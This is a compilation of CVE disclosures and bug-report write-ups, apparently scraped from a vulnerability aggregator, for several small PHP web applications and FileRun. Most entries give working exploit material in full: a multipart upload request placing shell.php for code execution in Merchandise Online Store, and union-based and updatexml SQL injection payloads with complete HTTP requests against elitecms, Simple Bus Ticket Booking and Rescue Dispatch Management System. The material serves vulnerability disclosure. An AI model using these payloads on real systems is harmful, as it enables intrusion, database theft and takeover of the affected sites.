In Afian Filerun 20220202 Changing the "search_tika_path" variable to a custom (and previously uploaded) jar file results in remote code execution in the context of the webserver user.

CVE-2022-30470: FileRun - Selfhosted File Manager with Sharing and Backup for Photos, Docs & More

Merchandise Online Store v1.0 by oretnom23 has an arbitrary code execution (RCE) vulnerability in the user profile upload point in the system information.

Permalink

Cannot retrieve contributors at this time

**Merchandise Online Store v1.0 by oretnom23 has arbitrary code execution (RCE)**

**Author** : ffYYy6x0y1

vendor: https://www.sourcecodester.com/php/14887/merchandise-online-store-php-free-source-code.html

Vulnerability url: http://ip/vloggers\_merch/admin/?page=user

Loophole location： There is an arbitrary file upload vulnerability (RCE) in the user profile upload point in the system information.

Request package for file upload：

POST /vloggers\_merch/classes/Users.php?f\=save HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/vloggers\_merch/admin/?page=user
Content-Length: 728
Content-Type: multipart/form-data; boundary=---------------------------972285327633
Cookie: PHPSESSID=ikts6n5evd3ahejiopufg6114g
Connection: close
\-----------------------------972285327633
Content-Disposition: form-data; name="id"
1
\-----------------------------972285327633
Content-Disposition: form-data; name="firstname"
Adminstrator
\-----------------------------972285327633
Content-Disposition: form-data; name="lastname"
Admin
\-----------------------------972285327633
Content-Disposition: form-data; name="username"
admin
\-----------------------------972285327633
Content-Disposition: form-data; name="password"
admin123
\-----------------------------972285327633
Content-Disposition: form-data; name="img"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------972285327633--

The files will be uploaded to this directory \\vloggers\_merch\\uploads

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-30423: bug_report/RCE-1.md at main · ffYYy6x0y1/bug_report

phpABook 0.9i is vulnerable to SQL Injection due to insufficient sanitization of user-supplied data in the "auth_user" parameter in index.php script.

**Vulnerability identifier:** #VU54518

**Vulnerability risk:** High

**CVSSv3.1:** 9 \[CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C\]

**CVE-ID:** N/A

**CWE-ID:** CWE-89  

**Exploitation vector:** Network

**Exploit availability:** No

**Vulnerable software:**  
phpABook  
Web applications / Modules and components for CMS

**Vendor:** Gilnei Moraes

**Description**  

The vulnerability allows a remote attacker to execute arbitrary SQL queries in database.

The vulnerability exists due to insufficient sanitization of user-supplied data in the "auth\_user" parameter in index.php script. A remote attacker can send a specially crafted request to the affected application and execute arbitrary SQL commands within the application database.

Successful exploitation of this vulnerability may allow a remote attacker to read, delete, modify data in database and gain complete control over the affected application.

**Mitigation**  
Cybersecurity Help is currently unaware of any official solution to address this vulnerability.

**Vulnerable software versions**

phpABook: 0.9i

**CPE**

*   cpe:2.3:a:gilnei\_moraes:phpabook:0.9i:\*:\*:\*:\*:\*:\*:\*

**External links**  
http://packetstormsecurity.com/files/163312  
http://www.exploit-db.com/exploits/50071

**Q & A**

**Can this vulnerability be exploited remotely?**

Yes. This vulnerability can be exploited by a remote non-authenticated attacker via the Internet.

**Is there known malware, which exploits this vulnerability?**

No. We are not aware of malware exploiting this vulnerability.

CVE-2022-30352: SQL injection in phpABook

Simple Bus Ticket Booking System 1.0 is vulnerable to SQL Injection via /SimpleBusTicket/index.php.

**Simple Bus Ticket Booking System v1.0 by codeastr.com has SQL injection**

vendors: https://codeastro.com/simple-bus-ticket-booking-system-in-php-with-source-code/

Vulnerability File: /SimpleBusTicket/index.php

Vulnerability location: /SimpleBusTicket/index.php, phr

\[+\] Payload: pnr=111' union select 1,2,3,4,database(),6,7,8--+&pnr-search=

dbname = sbtbsphp ---> length = 8

POST /SimpleBusTicket/index.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0m2td1md252hlnr3nsbmc5ss99
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
pnr=111' union select 1,2,3,4,database(),6,7,8--+&pnr-search=

CVE-2022-30817: bug_report/SQLi-1.md at main · k0xx11/bug_report

elitecms v1.01 is vulnerable to SQL Injection via /admin/add_sidebar.php.

**Elitecms v1.01 by elitecms has SQL injection**

vendors: https://elitecms.net/download.php

Vulnerability File: /admin/add\_sidebar.php

Vulnerability location: ip/eliteCMS1.01/admin/add\_sidebar.php?page=, page

dbname: elitecms101

\[+\] Payload: /eliteCMS1.01/admin/add\_sidebar.php?page=-1%20union%20select%201,2,3,4,database(),6,7,8,9,10,11--+&sidebar=3 // Leak place ---> page

GET /eliteCMS1.01/admin/add\_sidebar.php?page\=\-1%20union%20select%201,2,3,4,database(),6,7,8,9,10,11\--+&sidebar=3 HTTP/1.1
Host: 192.168.1.108
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=307ef75a2f3ab4c1103d8a1e90cf120e
Connection: close

CVE-2022-30814: bug_report/SQLi-5.md at main · k0xx11/bug_report

elitecms v1.01 is vulnerable to SQL Injection via admin/edit_post.php.

Permalink

**Elitecms v1.01 by elitecms has SQL injection**

vendors: https://elitecms.net/download.php

Vulnerability File: /admin/edit\_post.php

Vulnerability location: ip/eliteCMS1.01/admin/edit\_post.php?page=1&post=, post

dbname: elitecms101

\[+\] Payload: /eliteCMS1.01/admin/edit\_post.php?page=1&post=-1%20union%20select%201,2,3,4,database(),6--+ // Leak place ---> post

GET /eliteCMS1.01/admin/edit\_post.php?page\=1&post\=\-1%20union%20select%201,2,3,4,database(),6\--\+ HTTP/1.1
Host: 192.168.1.108
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=307ef75a2f3ab4c1103d8a1e90cf120e
Connection: close

CVE-2022-30810: bug_report/SQLi-2.md at main · k0xx11/bug_report

elitecms 1.01 is vulnerable to SQL Injection via /admin/add_post.php.

**Elitecms v1.01 by elitecms has SQL injection**

vendors: https://elitecms.net/download.php

Vulnerability File: /admin/add\_post.php

Vulnerability location: ip/eliteCMS1.01/admin/add\_post.php?page=, page

dbname: elitecms101

\[+\] Payload: /eliteCMS1.01/admin/add\_post.php?page=-3%20union%20select%201,2,3,4,database(),6,7,8,9,10,11--+ // Leak place ---> page

GET /eliteCMS1.01/admin/add\_post.php?page\=\-3%20union%20select%201,2,3,4,database(),6,7,8,9,10,11\--\+ HTTP/1.1
Host: 192.168.1.108
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=307ef75a2f3ab4c1103d8a1e90cf120e
Connection: close

CVE-2022-30813: bug_report/SQLi-3.md at main · k0xx11/bug_report

elitecms 1.01 is vulnerable to SQL Injection via /admin/edit_page.php?page=.

**Elitecms v1.01 by elitecms has SQL injection**

vendors: https://elitecms.net/download.php

Vulnerability File: eliteCMS1.01/admin/edit\_page.php?page=

Vulnerability location: ip/eliteCMS1.01/admin/edit\_page.php?page=, page

dbname: elitecms101

\[+\] Payload: /eliteCMS1.01/admin/edit\_page.php?page=-1%20union%20select%201,database(),3,4,5,6,7,8,9,10,11--+ // Leak place ---> page

GET /eliteCMS1.01/admin/edit\_page.php?page\=\-1%20union%20select%201,database(),3,4,5,6,7,8,9,10,11\--\+ HTTP/1.1
Host: 192.168.1.108
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=307ef75a2f3ab4c1103d8a1e90cf120e
Connection: close

CVE-2022-30809: bug_report/SQLi-1.md at main · k0xx11/bug_report

Rescue Dispatch Management System v1.0 is vulnerable to SQL Injection via /rdms/classes/Master.php?f=delete_respondent_type.

Permalink

Cannot retrieve contributors at this time

**Rescue Dispatch Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15296/rescue-dispatch-management-system-phpoop-free-source-code.html

Vulnerability File: /rdms/classes/Master.php?f=delete\_respondent\_type

Vulnerability location: /rdms/classes/Master.php?f=delete\_respondent\_type, id

\[+\] Payload: id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /rdms/classes/Master.php?f\=delete\_respondent\_type HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/rdms/admin/?page=respondent\_types
Content-Length: 65
Cookie: PHPSESSID=hkbchcmaitn0d8enhm4jtdjk9q
Connection: close
id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-31951: bug_report/SQLi-4.md at main · k0xx11/bug_report

Rescue Dispatch Management System v1.0 is vulnerable to SQL Injection via /rdms/classes/Master.php?f=delete_report.

Permalink

Cannot retrieve contributors at this time

**Rescue Dispatch Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15296/rescue-dispatch-management-system-phpoop-free-source-code.html

Vulnerability File: /rdms/classes/Master.php?f=delete\_report

Vulnerability location: /rdms/classes/Master.php?f=delete\_report, id

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /rdms/classes/Master.php?f\=delete\_report HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/rdms/admin/?page=incident\_reports
Content-Length: 65
Cookie: PHPSESSID=hkbchcmaitn0d8enhm4jtdjk9q
Connection: close
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

Tag

#php